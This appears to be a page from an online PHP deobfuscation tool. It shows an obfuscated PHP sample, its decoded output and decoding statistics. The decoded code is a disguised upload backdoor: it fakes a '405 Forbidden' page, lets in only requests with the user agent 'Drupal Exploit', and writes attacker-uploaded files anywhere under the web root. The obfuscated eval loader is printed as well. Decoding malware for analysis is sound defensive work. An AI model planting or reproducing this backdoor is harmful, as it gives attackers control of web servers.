Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php $code = "XZFRa8IwFIWfFfwPEQq3BWndujFYdTC3WvcyZtwGW5HQlDSOam2jjabif19aN2R7CeTe73AO5w..
Decoded Output download
error_reporting(0);
echo '<title>405 Forbidden</title>';
echo '<h2>405 Forbidden.</h3>';
if ($_SERVER['HTTP_USER_AGENT'] != 'Drupal Exploit'){ header('location: http://joomlatemplates31337.blogspot.co.uk'); exit;}
if (!empty($_FILES)){
$x = $_FILES['joss']['tmp_name'];
$y = $_SERVER['DOCUMENT_ROOT'] . $_REQUEST['ke'] . '/';
$z = str_replace('//','/',$y) . $_FILES['joss']['name'];
move_uploaded_file($x,$z);
}
Did this file decode correctly?
Original Code
<?php
$code = "XZFRa8IwFIWfFfwPEQq3BWndujFYdTC3WvcyZtwGW5HQlDSOam2jjabif19aN2R7CeTe73AO5wrGKCNMxJRxGW3NvuV12iIvKYIBl1yJu6v+NZpRtpZFIaKBcxrCmSov/yL2wCndBpAbZBpkjP0n7IfwFgQPZKJ/5PkV3wcwR90hgilbxJlCOI0VlRysAypFVghmgqJ5xiWNblHJeXzrODtKK5VxUcX1m7gXrntjrxXdJjHldk7txR4sD4lUcu94cu9qmC91iNn7Bx5b1qHTbhkpGqKfSQg7miQwD4FXMYmySsDcq5llw/xGn45eJp86M/FHozq4rXc+fpzgcRDCXjQTcKBRrrQSJbzpVGW5MMFxoKe3PWNpNcp/zmfXVkW/BFnoJnQDBdlIJUwj7Rmr+ibHbw==";
eval(str_rot13(gzinflate(base64_decode($code))));
Function Calls
gzinflate | 1 |
str_rot13 | 1 |
base64_decode | 1 |
Stats
MD5 | ac8437019de1e5f9d714af33801e4b34 |
Eval Count | 1 |
Decode Time | 86 ms |